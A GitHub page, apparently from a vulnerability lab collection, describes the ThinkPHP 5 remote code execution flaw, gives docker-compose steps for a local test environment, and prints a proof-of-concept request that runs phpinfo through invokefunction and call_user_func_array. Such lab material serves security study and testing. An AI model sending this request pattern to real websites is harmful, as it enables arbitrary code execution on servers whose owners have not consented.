Skip to content
Branch: master
Find file History
ldqsmile and JrDw0 Translate/thinkphp5-RCE (#89)
* Rename README.md to README.zh-cn.md

* Create README.md

* Update README.md

* Update README.md
Latest commit 34bb706 Dec 19, 2018
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
1.png add manual Dec 12, 2018
README.md Translate/thinkphp5-RCE (#89) Dec 19, 2018
README.zh-cn.md Translate/thinkphp5-RCE (#89) Dec 19, 2018
docker-compose.yml

README.md

Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability

中文版本(Chinese version)

ThinkPHP is an extremely widely used PHP development framework in China. In its version 5, as the framework processes controller name incorrectly, it can execute any method if the website doesn't have mandatory routing enabled (which is default), resulting in a RCE vulnerability.

Reference links:

Environment Setup

Enter the following command:(ThinkPHP version:5.0.20)

docker-compose up -d

Visit http://your-ip:8080 and you'll see the default page of ThinkPHP.

POC

Directly visit http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 and it'll execute the phpinfo:

You can’t perform that action at this time.